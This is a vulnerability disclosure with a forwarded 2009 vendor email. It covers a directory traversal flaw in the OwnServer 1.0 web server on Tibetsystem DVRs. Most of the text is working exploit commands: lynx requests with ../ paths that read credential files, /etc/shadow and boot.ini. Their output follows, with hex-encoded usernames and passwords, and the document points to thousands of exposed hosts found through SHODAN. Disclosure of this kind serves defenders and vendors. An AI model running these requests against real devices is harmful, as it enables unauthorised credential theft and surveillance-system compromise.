Tibetsystem OwnServer 1.0 Directory Traversal

`I tried to report this to the vendor in 2009. SHODAN "OwnServer1.0":  
Results 1 - 10 of about 11832 for OwnServer1.0 country:US.  
  
-Jason Ellison  
  
---------- Forwarded message ----------  
From: Jason Ellison <[email protected]>  
Date: Fri, Apr 10, 2009 at 5:02 PM  
Subject: DVR Security Issue  
To: [email protected]  
  
Hello,  
  
I am a I.T. consultant in the U.S. I have  
discovered a security flaw in your product. Please forward to the  
appropriate person in your company (software engineer maybe?).  
  
Tibetsystem DVR security issue:  
  
Your Windows and Linux based DVR use the same webserver,  
"OwnServer1.0"... This web server has a directory traversal  
vulnerability that was discovered in 2004. This can be used to get  
the usernames and passwords of the DVR (or any local file). The  
usernames and passwords are Hex encoded ASCII.  
  
In addition to this the webapp delivers the complete server config  
including ALL valid usernames and passwords if you give proper  
authentication. So if I login using default anonymous:blank, all  
accounts and passwords are delivered in clear text.  
  
Is there an update for this issue?  
  
$ lynx -source http://a.b.c.d/../../../../../../../home/dvr/sdvr/kdvr/user.ini  
[@Sdvr]  
validate=1  
  
[user_time]  
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
  
[users]  
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF130000FFFF00000000000000000000000000000000000019  
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001A0000FFFFFF  
  
  
$ lynx -source http://a.b.c.d/../../windows/dvr2.ini  
[generic]  
encoder=0  
dual_streaming=1  
[dfs3]  
current_path=E:\dfs  
recycle=1  
retain=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0  
record_path=F:\dfs;E:\dfs;  
[Viewer]  
run=C:\dvr\remote.exe,5.5.0.0  
setup=C:\dvr\client\clientinstall.exe,5.5.0.0  
[user_time]  
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
[user32]  
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF930000FFFF00000000000000000000000000000000000099  
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0000FFFFFFFF130000001300000013000000130000003B  
  
  
lynx -source http://10.10.10.56/../../../../../../../etc/shadow  
root:$1$q0HFBbpi$removed:13328:0:99999:7:::  
bin:*:13328:0:99999:7:::  
daemon:*:13328:0:99999:7:::  
adm:*:13328:0:99999:7:::  
lp:*:13328:0:99999:7:::  
sync:*:13328:0:99999:7:::  
shutdown:*:13328:0:99999:7:::  
halt:*:13328:0:99999:7:::  
mail:*:13328:0:99999:7:::  
news:*:13328:0:99999:7:::  
uucp:*:13328:0:99999:7:::  
operator:*:13328:0:99999:7:::  
games:*:13328:0:99999:7:::  
nobody:*:13328:0:99999:7:::  
rpm:!!:13328::::::  
messagebus:!!:13328::::::  
haldaemon:!!:13328::::::  
vcsa:!!:13328::::::  
xfs:!!:13328::::::  
rpc:!!:13328::::::  
rpcuser:!!:13328::::::  
clamav:!!:13328::::::  
sshd:!!:13328::::::  
quess:$1$tpvrlLSt$removed:13328:0:99999:7:::  
  
  
$ lynx -source http://a.b.c.d/../../boot.ini  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home  
Edition" /noexecute=optin /fastdetect  
  
  
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-01/0184.html  
OwnServer 1.0 Directory Transversal Vulnerability  
  
`